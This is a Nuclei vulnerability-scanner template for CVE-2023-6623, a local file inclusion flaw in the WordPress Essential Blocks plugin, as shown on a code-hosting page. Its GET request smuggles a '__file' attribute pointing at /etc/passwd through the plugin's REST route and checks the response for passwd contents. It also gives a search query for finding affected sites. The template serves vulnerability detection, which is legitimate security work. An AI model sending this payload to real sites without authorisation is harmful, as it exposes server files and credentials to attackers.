nuclei-templates/http/cves/2023/CVE-2023-6623.yaml

47 lines
2.0 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2023-6623
info:
name: Essential Blocks < 4.4.3 - Local File Inclusion
author: iamnoooob,rootxharsh,pdresearch,coldfish
severity: critical
description: |
Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.
impact: |
An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
remediation: |
Upgrade to the latest version of Essential Blocks 4.4.3 to fix this issue.
reference:
- https://wpscan.com/blog/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3/
- https://flysec-blog.blogspot.com/2024/01/cve-2023-6623-file-inclusion.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6623
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6623
cwe-id: CWE-22
epss-score: 0.10258
epss-percentile: 0.9444
cpe: cpe:2.3:a:wpdeveloper:essential_blocks:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: wpdeveloper
product: essential_blocks
framework: wordpress
publicwww-query: "/wp-content/plugins/essential-blocks/"
tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi
http:
- method: GET
path:
- '{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"}'
- '{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt'
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "regex('root:.*:0:0:', body_1)"
- 'contains(body_2, "Essential Blocks Page")'
condition: and
# digest: 4b0a00483046022100f990befa544138cd2d51add0c6c50c3d44a04142dc01d5bf4a2128c819e4b4ca02210094c99fbe75a212eda499e0b1d07c71f34ea341df6bdaedc34b55d474930c3461:922c64590222798bb761d5b6d8e72950